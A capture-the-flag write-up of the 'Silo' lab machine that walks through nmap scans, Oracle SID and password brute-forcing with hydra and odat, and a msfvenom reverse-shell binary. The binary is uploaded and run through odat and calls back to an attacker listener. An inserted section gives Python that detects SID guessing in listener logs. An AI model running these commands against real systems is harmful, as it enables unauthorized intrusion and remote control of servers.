Ping

ping 10.10.10.82

Nmap Default Scan

nmap 10.10.10.82 -oN dnmap

Nmap Script And Service Scan

nmap 10.10.10.82 -sV -sC -A -oN snmap

Nmap All Port Scan

nmap 10.10.10.82 -p- -sC -sV --open -T5 -oN anmap

Oracle Enumeration on Port 1521

First, check whether the listener on port 1521 is open.

tnscmd10g status -h 10.10.10.82

No luck, so use hydra to get the SID or credentials.

hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid -t 64 -I

odat can also be used to find a valid SID.

odat sidguesser -s 10.10.10.82 -p1521

Found a valid SID: XE. Use it to guess credentials.

odat passwordguesser -s 10.10.10.82 -p1521 -d XE

or

odat all -s 10.10.10.82 -p 1521 -d XE -v

This takes time; wait for the enumeration to complete. Got it…!

We now have valid credentials: username scott and password tiger for the server identified as XE. We can use these credentials to upload and execute a reverse shell.
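
Seen from the database host, the SID guessing above (hydra oracle-sid, odat sidguesser) shows up in the TNS listener log as a run of connects rejected with TNS-12505 from a single source. The detection check below is an added example, not part of the original walkthrough; it assumes the text listener.log layout with " * "-separated fields, and the sample lines, the 192.0.2.x addresses and the min_distinct threshold are constructed for illustration.

```python
import re
from collections import defaultdict

TNS_UNKNOWN_SID = 12505  # TNS-12505: listener does not currently know of SID given

def parse_entry(line):
    """Parse one connect entry: timestamp * CONNECT_DATA * ADDRESS * event * SID * code."""
    parts = [p.strip() for p in line.split(" * ")]
    if len(parts) != 6 or parts[3] != "establish":
        return None  # error text lines and other non-connect entries
    sid = re.search(r"\(SID=([^)]*)\)", parts[1])      # SERVICE_NAME connects are skipped
    src = re.search(r"\(HOST=([^)]+)\)", parts[2])     # client address, not the CID host
    if not (sid and src and parts[5].isdigit()):
        return None
    return src.group(1), sid.group(1).upper(), int(parts[5])

def find_sid_guessing(lines, min_distinct=5):
    """Map each source to the unknown SIDs it tried, if it tried at least min_distinct."""
    rejected = defaultdict(set)
    for line in lines:
        entry = parse_entry(line)
        if entry and entry[2] == TNS_UNKNOWN_SID:
            rejected[entry[0]].add(entry[1])
    return {s: sorted(sids) for s, sids in rejected.items() if len(sids) >= min_distinct}

def make_line(sec, src, sid, code):
    """Build a constructed log line in the listener.log text layout (sample data only)."""
    return (f"12-JAN-2018 10:15:{sec:02d} * (CONNECT_DATA=(SID={sid})"
            f"(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)"
            f"(HOST={src})(PORT=40112)) * establish * {sid} * {code}")

# Constructed sample: one host cycling through a SID wordlist, then hitting XE,
# plus an unrelated host with a single mistyped SID.
GUESSES = ["ORCL", "PROD", "TEST", "DEV", "DB11G", "PLSEXTPROC"]
SAMPLE = [make_line(i, "192.0.2.50", sid, 12505) for i, sid in enumerate(GUESSES)]
SAMPLE.append("TNS-12505: TNS:listener does not currently know of SID given in connect descriptor")
SAMPLE.append(make_line(7, "192.0.2.50", "XE", 0))
SAMPLE.append(make_line(9, "192.0.2.77", "XEE", 12505))

if __name__ == "__main__":
    for src, sids in find_sid_guessing(SAMPLE).items():
        print(f"possible SID guessing from {src}: {len(sids)} unknown SIDs {sids}")
```

Counting distinct rejected SIDs per source, rather than raw failures, keeps a misconfigured application that retries one wrong SID from tripping the alert.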

Generate a binary using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe > shell.exe

Upload it to the server

odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp pwn.exe /root/HTB/linux/silo/shell.exe

Set up a listener, then trigger the binary to catch the reverse shell

rlwrap nc -nvlp 443
odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp pwn.exe

Got it…! We are NT AUTHORITY, so there is no need for privilege escalation…!

User.txt

Root.txt

Done with Silo…:)